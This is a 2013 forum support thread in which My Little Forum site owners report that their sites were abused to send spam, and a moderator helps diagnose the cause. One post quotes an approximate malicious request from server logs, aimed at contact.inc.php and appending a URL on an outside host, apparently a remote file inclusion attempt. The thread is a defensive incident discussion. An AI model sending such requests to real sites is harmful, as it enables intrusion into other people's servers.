Site with just MLF is sending out spam and host disabled me. (General)

by MLF User, Sunday, March 17, 2013, 18:44 (4029 days ago)

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?

Avatar

Site with just MLF is sending out spam and host disabled me.

by Auge ⌂, Sunday, March 17, 2013, 23:37 (4029 days ago) @ MLF User

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?

What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you, wich function was abused (posting form, contact form)?

Tschö, Auge

--
Trenne niemals Müll, denn er hat nur eine Silbe!

Site with just MLF is sending out spam and host disabled me.

by MLF User, Tuesday, March 26, 2013, 01:06 (4021 days ago) @ Auge

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?


What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you, wich function was abused (posting form, contact form)?

Tschö, Auge

Hi sorry about the delay.
I had it setup that only registered users could post.
HostGator finally got back with me and told me that MLF is known to be a vulnerable script and that it is not longer maintained by the developers. I had a friend look at some things before we shut down the account and he said the same time the spams were going out, the file /includes/contact.inc.php was getting hit by several IP addresses at the same time and the URL it was using was very weird. It was like
http://mydomain.com/includes/contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt

This isnt the exact URL that was shown in the apache logs but it was a bunch of slashes, @ signs, $admin, and they all ended with that ?http://218.69.248.24/hapy.txt

At the time he found this (the next day), we tried to bring up http://218.69.248.24/hapy.txt but it wouldnt load.

We left HostGator and went with a new host from his suggestion and now using a different forum, but we wanted one that had a tree view like the one this does, not the kind we're using now (SMF) since that's what our members wanted, it was like the old school UBB type of forum.

I asked him to come here and post what he knows, but it doesnt look like he has yet. The original admin of our forum is gravely ill and now it's just 3 of us taking it over and we're not quite sure what we are doing but this is as much info as I know and hope it helps.

Avatar

Site with just MLF is sending out spam and host disabled me.

by Auge ⌂, Thursday, March 28, 2013, 01:15 (4019 days ago) @ MLF User

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?


What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you, wich function was abused (posting form, contact form)?


I had it setup that only registered users could post.
HostGator finally got back with me and told me that MLF is known to be a vulnerable script and that it is not longer maintained by the developers.

I found many exploits for outdated versions but none for MLF 2.3 (maybe there are some reports, but I didn't found them). On the other side, the script is under maintenance, but it's a spare time project of one person and few time to time helpers.

I had a friend look at some things before we shut down the account and he said the same time the spams were going out, the file /includes/contact.inc.php was getting hit by several IP addresses at the same time and the URL it was using was very weird. It was like
http://mydomain.com/includes/contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt

This isnt the exact URL that was shown in the apache logs but it was a bunch of slashes, @ signs, $admin, and they all ended with that ?http://218.69.248.24/hapy.txt

At the time he found this (the next day), we tried to bring up http://218.69.248.24/hapy.txt but it wouldnt load.

The server under the IP seems to be disabled. The IP 218.69.248.24 is located in China (China Unicom Tianjin province network). That makes it probable that it is a junk bot. I can't imagine a scenario, where a path like contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt matches. Maybe someone else can tell us something about it.

When only registered members are allowed to post, the contact form is the only open hole for spammers. In many countries you can't disable the contact form due to judical reasons.

I took the path you posted and requested it on Alex's server (replaced mydomain.com with mylittleforum.net/forum/) and got the HTTP status 404 (page not found). Maybe it is "only" a hazard-free DoS (that's not nice for the hoster) and not a successful spam attack (no sended spam mails).

Tschö, Auge

--
Trenne niemals Müll, denn er hat nur eine Silbe!

Site with just MLF is sending out spam and host disabled me.

by Danzig, Thursday, April 04, 2013, 05:48 (4012 days ago) @ Auge

I've also been banned by my ISP due to spam from MLF. Although I had mathematical CAPTCHA enabled on new user registrations, hundreds of fake users were created and MLF sent out emails to these users. Due to these emails I was banned, and my domain and IP ended up in all sort of spam filters. Is there any way to fix this? Now I have closed automatic registrations and have potential new users contact me and I create users manually – which is a pain.

RSS Feed of thread